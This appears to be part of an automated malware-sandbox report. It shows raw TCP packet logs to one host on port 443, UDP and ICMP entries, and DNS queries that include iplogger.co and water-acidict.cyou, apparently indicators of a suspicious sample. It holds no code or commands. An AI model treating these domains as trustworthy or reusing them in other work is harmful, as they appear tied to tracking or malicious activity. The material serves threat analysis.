                                                                                                                                      Nov 29, 2024 23:11:58.520411015 CET49900443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.520415068 CET4434990013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.816519976 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.816894054 CET49901443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.816916943 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.817300081 CET49901443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.817306042 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.957159042 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.957581043 CET49902443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.957607031 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.958034992 CET49902443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.958039999 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.963078022 CET4434990013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.966325045 CET4434990013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.966389894 CET49900443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.966439009 CET49900443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.966449022 CET4434990013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.966456890 CET49900443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.966460943 CET4434990013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.968868017 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.968885899 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:58.968981028 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.969095945 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:58.969105005 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.279004097 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.279086113 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.279135942 CET49901443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.279844046 CET49901443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.279854059 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.279864073 CET49901443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.279870033 CET4434990113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.292104959 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.292159081 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.292220116 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.294101000 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.294117928 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.303210020 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.303632021 CET49903443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.303647041 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.304210901 CET49903443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.304214954 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.394447088 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.394489050 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.394536972 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.394551039 CET49902443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.394594908 CET49902443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.396598101 CET49902443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.396604061 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.396617889 CET49902443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.396621943 CET4434990213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.402775049 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.402790070 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.402846098 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.406105042 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.406115055 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.736924887 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.737010956 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.737850904 CET49903443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.738393068 CET49903443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.738399029 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.738409996 CET49903443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.738413095 CET4434990313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.742769957 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.742783070 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.742846012 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.742971897 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.742983103 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.851716042 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.854259014 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.854310989 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.867286921 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.867297888 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.287729979 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.290927887 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.290962934 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.291033983 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.291079998 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.291107893 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.291119099 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.291126013 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.293812990 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.293834925 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.297863007 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.298038006 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.298048973 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.750015020 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.750611067 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.750622034 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.751331091 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.751334906 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.138636112 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.139172077 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.139189005 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.139906883 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.139910936 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.194397926 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.197514057 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.197588921 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.197635889 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.197643042 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.197659016 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.197663069 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.200932026 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.200958967 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.201042891 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.201199055 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.201210022 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.250679016 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.251218081 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.251224041 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.251678944 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.251682997 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.528358936 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.528820038 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.528834105 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.529387951 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.529392958 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634044886 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634083033 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634133101 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634138107 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634179115 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634367943 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634387970 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634404898 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634408951 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.636953115 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.636977911 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.637053967 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.637203932 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.637216091 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740617037 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740667105 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740712881 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.740849018 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.740858078 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740865946 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.740869999 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.742952108 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.742981911 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.743053913 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.743185043 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.743201017 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.971457958 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974729061 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974850893 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.974865913 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974901915 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974955082 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.976255894 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.976267099 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.976279974 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.976284981 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.979036093 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.979067087 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.979167938 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.979336977 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.979350090 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.143258095 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.143610001 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.143624067 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.144018888 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.144022942 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.633869886 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.636843920 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.636894941 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.636934996 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.636951923 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.636965036 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.636969090 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.639704943 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.639729977 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.639786959 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.639874935 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.639887094 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.017824888 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.018420935 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.018436909 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.018841982 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.018847942 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.462090015 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465276957 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465318918 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465344906 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465373039 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465540886 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465559006 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465570927 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465574980 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.467750072 CET49915443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.467791080 CET4434991513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.467876911 CET49915443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.468039036 CET49915443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.468050957 CET4434991513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.473853111 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.478107929 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.478136063 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.478661060 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.478671074 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.542650938 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.546201944 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.546215057 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.546471119 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.546475887 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.865523100 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.866008997 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.866022110 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.866435051 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.866440058 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.929830074 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.929898024 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.929965019 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.930284977 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.930304050 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.930316925 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.930321932 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.932657957 CET49916443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.932698965 CET4434991613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.932796001 CET49916443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.932957888 CET49916443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.932976961 CET4434991613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.024386883 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.024518967 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.024635077 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.024661064 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.024678946 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.024688959 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.024693966 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.027184963 CET49917443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.027216911 CET4434991713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.027331114 CET49917443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.027440071 CET49917443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.027452946 CET4434991713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.319597006 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.319664955 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.319736958 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.319942951 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.319942951 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.319953918 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.319962025 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.322680950 CET49918443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.322721004 CET4434991813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.322796106 CET49918443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.322956085 CET49918443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.322969913 CET4434991813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.412235022 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.412589073 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.412616014 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.413012028 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.413017035 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.846574068 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.850188017 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.850244045 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.850254059 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.850307941 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.850361109 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.850361109 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.850377083 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.850384951 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.853189945 CET49919443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.853205919 CET4434991913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:04.853260040 CET49919443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.853400946 CET49919443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:04.853410959 CET4434991913.107.246.63192.168.2.4

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 29, 2024 23:09:58.848608017 CET6450353192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:09:58.848881006 CET4998053192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:09:58.972218037 CET53527611.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:09:59.043684006 CET53492941.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:09:59.252136946 CET53645031.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:09:59.361128092 CET53499801.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.391649961 CET6388753192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:10:01.807292938 CET53638871.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.948712111 CET53511451.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.351427078 CET5836153192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:10:03.351520061 CET5546453192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:10:03.398236036 CET5371353192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:10:03.398627996 CET5635653192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:10:03.489132881 CET53583611.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.489276886 CET53554641.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.538033962 CET53537131.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.541260004 CET53563561.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:14.559303999 CET53525371.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:19.993191957 CET138138192.168.2.4192.168.2.255
                                                                                                                                      Nov 29, 2024 23:10:33.359049082 CET53525171.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:56.162596941 CET53561101.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.857192039 CET53561011.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.394181967 CET5820253192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:11:03.394301891 CET5044853192.168.2.41.1.1.1
                                                                                                                                      Nov 29, 2024 23:11:03.531680107 CET53504481.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.532004118 CET53582021.1.1.1192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.405805111 CET53612701.1.1.1192.168.2.4

                                                                                                                                      ICMP Packets

                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                      Nov 29, 2024 23:09:59.361207008 CET192.168.2.41.1.1.1c251(Port unreachable)Destination Unreachable

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Nov 29, 2024 23:09:58.848608017 CET192.168.2.41.1.1.10x284dStandard query (0)iplogger.coA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:09:58.848881006 CET192.168.2.41.1.1.10x5816Standard query (0)iplogger.co65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:01.391649961 CET192.168.2.41.1.1.10x771aStandard query (0)water-acidict.cyouA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.351427078 CET192.168.2.41.1.1.10xc8cfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.351520061 CET192.168.2.41.1.1.10x98f0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.398236036 CET192.168.2.41.1.1.10x812eStandard query (0)iplogger.coA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.398627996 CET192.168.2.41.1.1.10x83e1Standard query (0)iplogger.co65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:11:03.394181967 CET192.168.2.41.1.1.10xb0f2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:11:03.394301891 CET192.168.2.41.1.1.10x97f9Standard query (0)www.google.com65IN (0x0001)false

